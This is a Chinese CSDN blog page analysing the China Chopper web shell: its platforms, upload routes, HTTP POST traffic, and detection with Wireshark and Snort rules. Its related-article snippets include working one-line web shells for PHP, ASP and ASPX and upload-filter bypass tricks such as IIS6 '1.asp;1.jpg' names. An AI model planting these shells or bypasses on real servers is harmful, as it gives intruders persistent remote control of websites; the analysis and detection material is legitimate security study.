mysql中国菜刀连接_中国菜刀(Chopper)详细剖析

最新推荐文章于 2024-06-16 09:39:18 发布
最新推荐文章于 2024-06-16 09:39:18 发布
阅读量1.5k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39601641/article/details/113943304
版权
本文详细剖析了中国菜刀(Chopper)这一轻量级Web Shell,探讨其在不同平台(如JSP, ASP, ASPX, PHP, CFM)上的适用性,以及在Linux下的PHP运行情况。分析了上传机制,包括通过WebDAV、JBoss jmx-console、Apache Tomcat管理页面等进行传输。同时,解析了其HTTP POST通讯方式,并提供了利用Wireshark检测此类通讯的方法和Snort IDS规则示例。" 123755755,1493609,Ubuntu 21.04 安装及优化Nginx指南,"['Ubuntu', 'nginx']
摘要由CSDN通过智能技术生成

在第一部门份的菜刀剖析里面,已经介绍了“中国菜刀”的易用界面以及一些高级特性。——其中最令人注目的,莫过于其作为web shell的大小,aspx版仅有73字节,在硬盘中才4k。而在这部分里,将会详细“中国菜刀”平台适用性、上传机制、通讯模式以及如何侦测,至于中国菜刀一直在争论的一个话题,有没有后门,各位基友,您看了就知道了。

平台:

web服务器平台——JSP, ASP, ASPX, PHP, 或 CFM。同时在Windows和Linux适用。在系列一的分析里面已经展示过“中国菜刀”在windows 2003 IIS 中运行ASPX的情况。在这一部分里,讲展示运行在Linux平台下的PHP情况。如下图所示,PHP版本的内容极其精简。

49820788_19.jpg

依赖与不同的平台,“中国菜刀”有不同的可选项。下图显示了在Linux平台下的文件管理特性,(类似于Windows)

49820788_20.jpg

下图显示了在MySQL下其数据库客户端例子,(对Linux目标服务器的数据库管理)

49820788_21.gif

如下图所示,

最低0.47元/天 解锁文章
weixin_39601641
关注
一句话木马拿Shell与菜刀原理
悦分享
07-12 1576
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
中国菜刀原理与实践
悦分享
08-03 1658
中国菜刀Chopper)是一款经典的网站管理工具,具有文件管理、数据库管理、虚拟终端等功能。服务端其中‍Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作。配置类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种主机地址 主机地址可为机器名或IP地址,如localhost数据库用户 连接数据库的用户名,如root数据库密码 连接数据库的密码,如123456。...
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1879
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
中国菜刀
qq_2411772106的博客
06-22 1335
中国菜刀工具是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理 一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");
菜刀、冰蝎、蚁剑、哥斯拉的流量特征
热门推荐
eternitymd的博客
04-29 2万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
菜刀,蚁剑,冰蝎,哥斯拉)流量特征分析总结
weixin_54603520的博客
05-15 4457
在红蓝攻防的过程中,webshell工具的流量特征分析一直时蓝队成员需要关注的重点。
中国菜刀,蚁剑,哥斯拉,冰蝎的流量特征区别
最新发布
Nove1205的博客
06-16 951
中国菜刀,蚁剑,哥斯拉,冰蝎的流量特征区别
Web安全深度剖析-笔记
qq_30378851的博客
11-20 3427
Web安全深度剖析-笔记 文章目录Web安全深度剖析-笔记HTTP基础知识http请求方法http状态码http消息头(字段)截取HTTP请求搜索引擎劫持SQLmap注入注入基础知识使用DVWA来练习使用sqlmapSQLmap基本使用方法更多的选项简述利用过程其他常用的参数用法SQLmap能检测到的注入类型其他检测SQL注入的工具上传漏洞WEB解析漏洞简介IIS6.0解析漏洞APACHE漏洞PH...
网络安全学习中的工具
gugonggugong的博客
12-06 3212
1> Nmap Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。 系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。 其基本功能有三个,一是探测一组主机是否在线;其次是扫描 主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。 2> P0f p0f是一个纯粹的被动指纹识别工具,它在不干涉双方通信的情...
菜刀,蚁剑,冰蝎,哥斯拉流量特征
2301_76786857的博客
12-24 2585
菜刀,蚁剑,冰蝎,哥斯拉四大webshell工具的流量特征。
Wireshark分析菜刀流量包
weixin_30680385的博客
05-25 1466
过滤http发现,共有四条会话(一个POST包一个回包) 查看HTTP流 %开头,url编码,urldecode 将&z0=后的内容进行base64解码 或者可以根据回包推测POST包请求的东西 第一个回包: 显示主机信息,推测使用uname -a命令 第二个回包: 在->| |<-中间的内容为目录,推测使用ls ...
wireshark分析菜刀。其实并没有看懂。。。。。
weixin_44722125的博客
05-05 1839
wireshark简介 Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。 emmm其实就是抓包 Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。网络封包分析软件的功能可想像成 “电工技师使用电表来量测电流、电压、电阻” 的工作 - 只是将场景移植到网络上,并将电线替换成网络线。在...
中国菜刀使用与原理分析
weixin_45597678的博客
12-04 2万+
中国菜刀的功能 中国菜刀的使用 原理分析
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
m0_73734159的博客
10-16 2108
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
重新学习--中国菜刀
diecai2192的博客
08-14 1348
1. 菜刀 (1)中国菜刀的请求方式为post。 (2)中国菜刀模拟了百度爬虫的user-agent,中国菜刀默认的连接中使用base64的方式进行编码传输,以便逃脱抓捕。 <?php eval($_POST['x']); ?> 客户端连接设置好URL,密码,连接。 一句话木马的核心就是: PHP eval() 函数 eval() 函数把字符串按照 ...
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 6100
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
菜刀php教程,中国菜刀chopper)功能介绍及使用教程
weixin_34774527的博客
03-09 5799
中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的:89/mingfang...
中国菜刀(chopper)官网原版下载!强烈鄙视那些发布所谓过狗菜刀的人!
weixin_33711647的博客
12-30 8006
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。 只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等],都可以用中国菜刀来进行管理! 常用功能: 文件管理,虚拟终端,数据库管理,自写脚本。 其它功能: Web浏览器(POST浏览/自定义/执行自定义JS代/定时刷新); 网站爬行(自动保存...
攻防_WebShell_常见webshell工具流量特征
redglare的博客
04-16 891
和冰蝎类似,哥斯拉为加密的通讯流量,因此通过流量进行检测会有很大的难度,由于 WAF 等流量检测型安全设备无法对加密的流量进行解密,因此只能采用一些比较宽泛的匹配规则进行检测。=”这种形式(下划线可替换为其他)所以,以_0x开头的参数名,后面为加密数据的数据包也可识别为蚁剑的流量特征。:连接的端口有一定的特征,冰蝎与webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右(就是比较大的端口),每连接一次,每建立一次新的连接,端口就依次增加。
chopper放大器电路
01-16
chopper放大器电路是一种专门用于放大信号的电路。它的工作原理是将输入信号通过一个开关周期性地切割成脉冲形式,然后在输出端再将这些脉冲信号重新组合成原始信号的放大后的形式。 在这种电路中,通常会采用两个电压控制开关或者晶体管来实现切割和重新组合的功能。通过不断地开关这些开关,放大器可以将输入信号放大到所需的幅度,并输出给下游电路。 chopper放大器电路的优点之一是能够有效地抑制直流漂移和低频噪声,因此在测量和传感器应用中非常适用。另外,它还可以扩展放大器的带宽,并且能够实现较高的增益和低失真。 然而,chopper放大器电路也存在一些缺点,比如需要更复杂的电路结构和更高的功耗。同时,它对输入信号的频率和幅度也有一定的要求,如果输入信号的频率过高或者过大,可能会影响放大器的工作效果。 总的来说,chopper放大器电路是一种在特定应用场景下非常有用的放大器电路,它能够克服一些常规放大器的局限性,并且能够提供更高质量的信号放大。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值